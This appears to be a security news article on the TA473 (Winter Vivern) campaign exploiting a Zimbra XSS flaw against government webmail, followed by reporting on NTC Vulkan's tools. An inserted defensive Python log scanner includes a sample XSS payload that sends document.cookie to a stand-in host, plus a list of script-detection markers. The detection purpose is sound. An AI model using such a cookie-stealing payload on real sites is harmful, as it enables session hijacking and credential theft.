March 31, 2023 | Ravie Lakshmanan | Cyber Espionage / APT

The advanced persistent threat (APT) actor known as Winter Vivern is targeting European and US officials as part of an ongoing cyber espionage campaign.

“Since at least February 2023, TA473 has continued to exploit an unpatched Zimbra vulnerability on public webmail portals to gain access to the email mailboxes of European government agencies,” Proofpoint said in a new report.

The enterprise security firm tracks the activity under the name TA473 (aka UAC-0114), describing it as a hostile crew whose operations align with Russian and Belarusian geopolitical objectives.

What it lacks in sophistication, it makes up for in persistence. In recent months, the group has been involved in attacks targeting national authorities in Ukraine and Poland, as well as government officials in India, Lithuania, Slovakia and the Vatican.

A wave of NATO-related intrusions involves the exploitation of CVE-2022-27926 (CVSS score: 6.1), a medium-severity security flaw in Zimbra Collaboration that could allow an unauthenticated attacker to execute arbitrary JavaScript or HTML code. The flaw has since been patched.

The attacks involve using scanning tools such as Acunetix to identify unpatched webmail portals belonging to targeted organizations, followed by phishing emails masquerading as benign government agencies.

The messages carry booby-trapped URLs that exploit the Zimbra cross-site scripting (XSS) flaw to execute a custom Base64-encoded JavaScript payload within the victim’s webmail portal, stealing usernames, passwords, and access tokens.

It is worth noting that each JavaScript payload is tailored to the targeted webmail portal, indicating that the attackers are willing to invest time and resources to reduce the likelihood of detection.
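A defender-side check for the delivery pattern described above, as an added example that is not from the article or from Proofpoint’s report: it decodes Base64-looking query-string values in web access logs and flags any that contain JavaScript. The log format, the /webmail/launch.jsp path and the err parameter are constructed placeholders, not the actual Zimbra endpoint.

```python
# Added detection example, not Proofpoint's or Zimbra's code: flag access-log requests whose
# query parameters decode to Base64-encoded JavaScript. Paths and log lines are constructed.
import base64
import binascii
import re
from urllib.parse import urlsplit, unquote
# Substrings a credential- or token-stealing script is likely to contain.
SCRIPT_MARKERS = ("<script", "document.cookie", "XMLHttpRequest", "fetch(", "localStorage", "eval(")
B64_RE = re.compile(r"^[A-Za-z0-9+/=_-]{24,}$")
REQ_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')

def decode_b64(value):
    """Decode standard or URL-safe Base64 text; return None if it is not Base64."""
    value = unquote(value)  # unquote, not unquote_plus: '+' is a Base64 digit
    if not B64_RE.match(value):
        return None
    decoder = base64.urlsafe_b64decode if "-" in value or "_" in value else base64.b64decode
    try:
        return decoder(value + "=" * (-len(value) % 4)).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None

def find_encoded_script_params(url):
    """Return (param, decoded) pairs whose Base64 value looks like JavaScript."""
    hits = []
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")  # split on the first '=' only, keeping padding
        decoded = decode_b64(value)
        if decoded and any(marker in decoded for marker in SCRIPT_MARKERS):
            hits.append((name, decoded))
    return hits

def scan_access_log(lines):
    """Return (line_no, url, hits) for every request that carries such a payload."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        hits = find_encoded_script_params(m.group("url")) if m else []
        if hits:
            findings.append((no, m.group("url"), hits))
    return findings

# Constructed sample log: one benign request, one carrying an encoded script.
PAYLOAD = base64.b64encode(b"<script>new Image().src='//c.invalid/?t='+document.cookie</script>").decode()
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2023:09:14:02 +0000] "GET /webmail/?skin=harmony HTTP/1.1" 200 512',
    f'198.51.100.7 - - [10/Mar/2023:09:15:31 +0000] "GET /webmail/launch.jsp?err={PAYLOAD} HTTP/1.1" 200 1024',
]
if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
```

Real logs usually percent-encode the value, so the decoder unquotes before testing the alphabet; tune SCRIPT_MARKERS to the portal’s legitimate traffic before alerting on it.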

“TA473’s continued approach to vulnerability scanning and exploitation of unpatched vulnerabilities affecting public webmail portals are key factors in this attacker’s success,” Proofpoint said.

“The group’s focus on continuous reconnaissance and painstaking research of public webmail portals, in order to reverse engineer JavaScript capable of stealing usernames, passwords and CSRF tokens, indicates an investment in compromising specific targets.”

The findings come alongside revelations that at least three Russian intelligence agencies, including the FSB, the GRU (linked to Sandworm), and the SVR (linked to APT29), may be using hacking tools and software developed by a Moscow-based IT contractor named NTC Vulkan.

These include frameworks such as Scan (to facilitate large-scale data collection), Amesit (to conduct information operations and manipulate public opinion), and Krystal-2B (to simulate coordinated IO/OT attacks against rail and pipeline control systems).

“Krystal-2B is a training platform that leverages Amesit ‘for the purpose of chaos’ to work with several IO components to simulate OT attacks against various types of OT environments,” Google-owned Mandiant said.

“Contract projects from NTC Vulkan provide insight into Russian intelligence investments in developing capabilities to deploy more efficient operations early in the attack lifecycle. It is part of a covert operation,” the threat intelligence firm said.
